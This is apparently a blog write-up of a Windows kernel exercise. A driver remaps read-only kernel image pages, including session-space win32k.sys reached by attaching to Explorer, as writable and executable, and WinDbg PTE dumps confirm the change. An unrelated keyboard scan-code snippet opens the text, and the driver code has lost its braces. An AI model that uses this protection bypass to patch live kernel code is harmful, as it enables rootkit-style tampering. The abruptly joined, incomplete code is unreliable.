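#include <assert.h>
#include <stddef.h>
#include <string.h>

#define KEY_MAKE  0   /* key pressed */
#define KEY_BREAK 1   /* key released */
#define KEY_E0    2   /* extended scan code prefix E0 */
#define KEY_E1    4   /* extended scan code prefix E1 */

/* User-mode stand-in for the relevant fields of KEYBOARD_INPUT_DATA. */
typedef struct {
    unsigned short MakeCode;
    unsigned short Flags;
} key_event_t;

/* Scan code Set 1, indexes 0x00-0x15 only (truncated for brevity). */
static const char *const set1_names[] = {
    "<unk>", "Esc", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0",
    "-", "=", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y"
};
#define SET1_COUNT (sizeof(set1_names) / sizeof(set1_names[0]))

/* Return the key name for a release event of a non-extended key that is
 * present in the table, or NULL for anything else. */
static const char *released_key_name(const key_event_t *ev)
{
    if (!(ev->Flags & KEY_BREAK))
        return NULL;                      /* key press: ignore */
    if (ev->Flags & (KEY_E0 | KEY_E1))
        return NULL;                      /* extended key: not covered here */
    if (ev->MakeCode >= SET1_COUNT)
        return NULL;                      /* outside the table */
    return set1_names[ev->MakeCode];
}
```

A complete translation would also have to track modifier state (Shift, CapsLock, AltGr) and the active keyboard layout, which is why the table-based approach is only a rough approximation.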

The first implementation I wrote is the following:
 #include <ntifs.h>  
 #include <string.h>   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
      DbgPrint("Unload routine\n");  
 // return value: 0 = success, nonzero = error  
 int change_protection(BYTE *virtual_address, ULONG length, PMDL *Mdl, PVOID *address)  
      *Mdl = IoAllocateMdl(virtual_address, length, 0, 0, NULL);  
      if(*Mdl == NULL)  
           return 1;  
      MmProbeAndLockPages(*Mdl, KernelMode, IoReadAccess);  
      *address = MmMapLockedPagesSpecifyCache(*Mdl, KernelMode, MmNonCached, (PVOID)virtual_address, FALSE, NormalPagePriority);  
      if(*address == NULL)  
           return 2;  
      DbgPrint("Mapped address: %p \n", *address);  
      if(MmProtectMdlSystemAddress(*Mdl, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)  
           return 3;  
      return 0;  
 void unmap_mdl(PMDL *Mdl, PVOID *Address)  
      MmUnmapLockedPages(*Address, *Mdl);  
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
      NTSTATUS status_code;  
      BYTE *nonpaged_address;  
      int code;  
      PMDL pMdl;  
      BYTE *new_address;   
      DriverObject->DriverUnload = MyUnload;  
      // taken from monitor.sys (mapped in the range fffff880`0459f000 - fffff880`045ad000)
      nonpaged_address = (BYTE *)0xfffff8800459f000;  
      code = change_protection(nonpaged_address, 0x10, &pMdl, (void*)&new_address);  
      DbgPrint("change protection return value: %d \n", code);  
      unmap_mdl(&pMdl, (void*)&new_address);  
      return STATUS_SUCCESS;  

The driver creates an MDL associated with a virtual address, then probes and locks it and finally maps it to a new virtual address. As an extra, I call the function MmProtectMdlSystemAddress to ensure that the RWX protection is set, but by debugging I have noticed that such protection is already in place after MmMapLockedPagesSpecifyCache (MmBuildMdlForNonPagedPool would normally have been more appropriate, but for the sake of this exercise it can be ignored). After the work is done, the MDL is released by unmapping its pages and deallocating it.

To verify that the protection is successfully changed, I made a simple test. I used the !pte debugger extension to translate the virtual address of the imagebase of monitor.sys:

kd> !pte 0xfffff8800459f000
VA fffff8800459f000

contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200110  
contains 0000000020CEE863
pfn 20cee     ---DA--KWEV

contains 800000003CDD7963
pfn 3cdd7     -G-DA--KW-V

(the command output has been edited for better readability)

Then, I repeated the test by using the virtual address that I obtained with MmMapLockedPagesSpecifyCache:

kd> !pte fffff8800d249000
VA fffff8800d249000

contains 000000003BF84863

pfn 3bf84     ---DA--KWEV

contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200348  
contains 0000000035879863
pfn 35879     ---DA--KWEV

PTE at FFFFF6FC40069248
contains 000000003CDD7963
pfn 3cdd7     -G-DA--KWEV

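The log shows that both virtual addresses map the same physical page (pfn 3cdd7), but while the original PTE has the NX bit set (800000003CDD7963, flags KW-V) and is therefore not executable, the PTE of the new mapping has it cleared (000000003CDD7963, flags KWEV).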
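The comparison can be double-checked by decoding the raw PTE values by hand. The following is a small sketch that extracts the fields relevant here from an x64 PTE (bit 0 is Valid, bit 1 is Write, bit 63 is NX, bits 51:12 hold the page frame number). The macro and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PTE_VALID    (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_NX       (1ULL << 63)            /* no-execute */
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL   /* bits 51:12 */

/* Page frame number referenced by the PTE. */
static uint64_t pte_pfn(uint64_t pte)
{
    return (pte & PTE_PFN_MASK) >> 12;
}

/* Non-zero if the page is present and code can be executed from it. */
static int pte_executable(uint64_t pte)
{
    return (pte & PTE_VALID) != 0 && (pte & PTE_NX) == 0;
}

/* Non-zero if the page is present and writable. */
static int pte_writable(uint64_t pte)
{
    return (pte & PTE_VALID) != 0 && (pte & PTE_WRITE) != 0;
}
```

Applied to the two values above, both decode to the same page frame number and only the NX bit differs, which matches the flags printed by !pte.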
As suggested by the exercise, I tested the same code using the imagebase address of win32k.sys, which is a session space address, and the system crashed with a BSOD. A quick investigation revealed the problem: the DriverEntry routine is called in the context of the System process, which is not associated with any session. Thus, the session space virtual addresses are not available and cannot be used to build MDLs.
I experimented a bit and found a simple trick to bypass this problem: since the System process is not associated with a session, the code should work if it is run from the context of a process that is. This is a simple modification that would make the driver code work:
      KAPC_STATE apcstate;  
      // taken from fffff960`00060000 fffff960`00370000  win32k   
      KeStackAttachProcess((PEPROCESS)0xfffffa8002d7a770, &apcstate); // explorer peprocess  
      nonpaged_address = (BYTE *)0xfffff96000060000;  
      code = change_protection(nonpaged_address, 0x10, &pMdl, (void*)&new_address);  
      DbgPrint("change protection return value: %d \n", code);  

I used KeStackAttachProcess in order to get in the context of Explorer.exe, which is associated to the currently logged in user, but any other process run inside the same login session would have worked (the PEPROCESS is hardcoded just for this test). Debugging this code, I tested the accessibility of win32k.sys imagebase address via WinDbg before the driver attached to Explorer:

kd> !pte 0xfffff96000060000
VA fffff96000060000

contains 0000000000000000

not valid

kd> db 0xfffff96000060000
fffff960`00060000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

Translating the virtual address to a physical one shows an invalid PTE, and even dumping the bytes from that memory address returns no data. However, as soon as I step beyond KeStackAttachProcess the address becomes available:

kd> !pte fffff960`00060000

VA fffff96000060000

contains 00000000184BC863

pfn 184bc     ---DA--KWEV

contains 0000000018ACD863
pfn 18acd     ---DA--KWEV

PDE at FFFFF6FB7E580000  
contains 0000000018DCC863
pfn 18dcc     ---DA--KWEV

PTE at FFFFF6FCB0000300
contains 8030000012588201
pfn 12588     C------KR-V

and the driver code works too, creating a mapping with RWX attribute:

kd> !pte fffff8800e0b4000
VA fffff8800e0b4000

contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200380  
contains 0000000030237863
pfn 30237     ---DA--KWEV

PTE at FFFFF6FC400705A0
contains 0000000012588963

pfn 12588     -G-DA--KWEV

If I step further with the debugger, past KeUnstackDetachProcess, the address becomes invalid again.

To figure out which function calls DriverEntry, I wrote a dummy driver, set a breakpoint on its entry point with DbgBreakPoint(), and ran it under a kernel debugger so that I could dump the stack.


The dump shows the functions that were called right before the DriverEntry. The function directly responsible for calling the entry point is IopLoadDriver, which is in turn called by IopLoadUnloadDriver. This function manages both the loading and unloading of a driver (calling the entry point or the driver unload routine respectively), and it is called by a dedicated system thread, as can be seen from the three functions ExpWorkerThread, PspSystemThreadStartup and KxStartSystemThread.
